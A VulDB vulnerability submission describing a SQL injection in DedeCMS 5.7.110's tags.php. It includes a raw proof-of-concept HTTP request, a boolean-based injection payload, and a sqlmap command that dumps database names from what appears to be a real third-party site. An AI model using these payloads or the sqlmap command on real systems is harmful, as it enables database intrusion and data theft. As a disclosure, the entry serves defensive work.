| 제목 | dedecms sql injection |
|---|
| 설명 | Website: www.dedecms.com/
Affected version: DedeCMS V5.7.110
Vulnerability description: dedecms's tag query interface has SQL injection, using the variable $tag_alias to interpolate strings in SQL query statements,
and does not perform any filtering or escape processing on $tag_alias. This allows malicious users to inject malicious SQL code by constructing specific URL parameters.
Attackers can use this to steal sensitive information such as databases.
POC :
GET /uploads/tags.php?QUERY_STRING=alias/alias/bbb* HTTP/1.1
Host: 127.0.0.1
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1689668702,1689755217,1689908948,1690348034; Hm_lvt_f8cddee34ca21f05373a9388cfdd798b=1691473417
Connection: close
SQLmap:
sqlmap.py -u "http://list.beijingcloud.com.cn/tags.php?QUERY_STRING=alias/alias/bbb*" -dbs --batch
Payload: http://127.0.0.1:80/uploads/tags.php?QUERY_STRING=alias/alias/bbb' AND 8367=8367 AND 'yMwU'='yMwU |
|---|
| 원천 | ⚠️ https://github.com/laoquanshi/cve |
|---|
| 사용자 | heishou (UID 53637) |
|---|
| 제출 | 2023. 08. 30. AM 04:49 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 09. 03. AM 09:01 (4 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 238636 [DedeCMS 5.7.110 /uploads/tags.php tag_alias SQL 주입] |
|---|
| 포인트들 | 18 |
|---|